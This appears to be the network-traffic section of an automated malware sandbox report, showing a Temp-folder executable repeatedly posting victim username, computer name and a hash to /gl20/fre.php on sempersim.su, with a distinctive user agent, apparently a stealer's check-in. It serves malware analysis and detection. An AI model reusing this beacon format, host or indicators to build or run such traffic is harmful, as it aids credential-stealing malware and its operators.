Nov 24, 2022 19:54:37.501775980 CET	272	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:39 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.6	49711	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:38.624655008 CET	273	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:38.688424110 CET	273	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:39.580168962 CET	273	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:42 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.6	49712	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:40.926341057 CET	274	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:40.984522104 CET	274	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:42.610241890 CET	275	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:44 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49713	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:43.021096945 CET	275	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:43.089515924 CET	276	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:44.610304117 CET	276	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:46 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49714	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:45.091814041 CET	277	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:45.168155909 CET	277	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:46.656018972 CET	277	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:48 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.6	49715	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:47.405096054 CET	278	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:47.462814093 CET	278	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:48.216784954 CET	279	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:50 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.6	49716	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:48.704817057 CET	280	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:48.762324095 CET	280	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:50.512831926 CET	291	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:52 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.6	49718	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:50.807734966 CET	292	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:50.871886015 CET	292	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:52.477982044 CET	292	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:54 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.6	49719	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:53.033943892 CET	293	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:53.097598076 CET	294	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:54.654089928 CET	294	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:56 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.6	49720	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:54.960633039 CET	295	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:55.026843071 CET	295	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:56.488534927 CET	295	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:58 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49699	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:15.956073046 CET	11	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:16.027601004 CET	12	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:17.569674015 CET	12	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:19 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.6	49721	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:56.896267891 CET	296	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:56.963457108 CET	296	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:58.247548103 CET	297	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:00 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.6	49722	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:59.769484997 CET	297	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:59.836323977 CET	298	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:01.407205105 CET	298	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:03 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.6	49723	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:01.692450047 CET	299	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:01.759412050 CET	299	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:03.460306883 CET	299	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:05 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.6	49724	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:03.741584063 CET	300	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:03.805641890 CET	301	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:05.403254986 CET	301	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:07 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.6	49725	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:05.694278955 CET	302	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:05.758548975 CET	302	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:07.447890043 CET	302	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:09 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.6	49726	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:07.738199949 CET	303	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:07.794753075 CET	303	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:09.535229921 CET	304	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:11 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.6	49727	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:09.788187027 CET	304	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:09.844965935 CET	305	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:11.470808983 CET	305	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:13 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.6	49728	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:11.780323982 CET	306	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:11.837272882 CET	306	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:13.560422897 CET	306	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:15 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.6	49729	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:13.852615118 CET	307	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:13.923044920 CET	308	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:15.362840891 CET	308	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:17 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.6	49730	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:16.067382097 CET	309	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:16.124342918 CET	309	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:17.735945940 CET	309	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:55:19 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49700	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:18.249996901 CET	13	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
